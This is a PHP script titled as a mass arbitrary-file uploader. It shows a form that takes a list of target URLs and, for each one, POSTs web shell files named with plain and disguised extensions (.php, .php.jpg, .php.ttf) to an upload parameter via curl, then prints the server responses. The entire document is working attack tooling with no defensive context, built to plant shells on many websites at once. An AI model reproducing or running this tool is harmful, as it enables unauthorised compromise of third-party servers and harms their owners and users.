MassArbitraryuploader.php

<html>
<title>tobi</title>
<body style="background-color:black;">
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<center><br />
<form action="" method="post">
<font color="white">
<input type="checkbox" name="php" value="kote.php">shell.php
<input type="checkbox" name="phpjpg" value="kote.php.jpg">shell.php.jpg
<input type="checkbox" name="phpttf" value="kote.php.ttf">shell.php.ttf
<input type="checkbox" name="txt" value="kote.txt">kote.txt
</font>

<br /><font color="white">Parameter:</font><input name="utk" value="Filedata"><br />
<textarea name="test" cols="80" rows="25" style="border:3px outset #339900; color:green; background-color:black;"></textarea><br>
<button type="submit" value="UPLOAD" style="border:3px outset red; width:50%; height:50px; color:white; background-color:red;">UPLOAD</button>

</form>
</center>
</body>
</html>
<?php

$phps = $_POST["php"];
$phpjpgs = $_POST["phpjpg"];
$phpttfs = $_POST["phpttf"];
$phptxts = $_POST["txt"];
$phps = $_POST["php"];
$para = $_POST["utk"];


//fungsi


//execu


   $array = preg_split('/(\r?\n)+/', $_POST['test']);
   foreach($array as $line)
   {


if($phps != null)
{
echo "<center><div width='80%'><br /><font style='color:black; background-color:#339900;'>";
echo "url:".$line." <font style='color:red; background-color:white;'>";

$ch = curl_init();
$data = array($para => "@$phps");
curl_setopt($ch, CURLOPT_URL, $line);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$tetek = curl_exec($ch);
$buang = strip_tags("\n result php:" . $tetek ."\n\n\n");
echo $buang;
echo "<br /></font></div></center>";
}
else
{
}
if($phpjpgs != null)
{
echo "<center><div width='80%'><br /><font style='color:black; background-color:#339900;'>";
echo "url:".$line." <font style='color:red; background-color:white;'>";

$ch = curl_init();
$data = array($para => "@$phpjpgs");
curl_setopt($ch, CURLOPT_URL, $line);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$tetek = curl_exec($ch);
$buang = strip_tags("\n result php.jpg:" . $tetek ."\n\n\n");
echo $buang;
echo "<br /></font></div></center>";
}
else
{
}

if($phpttfs != null)
{
echo "<center><div width='80%'><br /><font style='color:black; background-color:#339900;'>";
echo "url:".$line." <font style='color:red; background-color:white;'>";

$ch = curl_init();
$data = array($para => "@$phpttfs");
curl_setopt($ch, CURLOPT_URL, $line);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$tetek = curl_exec($ch);
$buang = strip_tags("\n result php.ttf:" . $tetek ."\n\n\n");
echo $buang;
echo "<br /></font></div></center>";
}
else
{
}

if($phptxts != null)
{
echo "<center><div width='80%'><br /><font style='color:black; background-color:#339900;'>";
echo "url:".$line." <font style='color:red; background-color:white;'>";

$ch = curl_init();
$data = array($para => "@$phptxts");
curl_setopt($ch, CURLOPT_URL, $line);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$tetek = curl_exec($ch);
$buang = strip_tags("\n result txt:" . $tetek ."\n\n\n");
echo $buang;
echo "<br /></font></div></center>";
}
else
{
}


   }

?>

</body>
</html>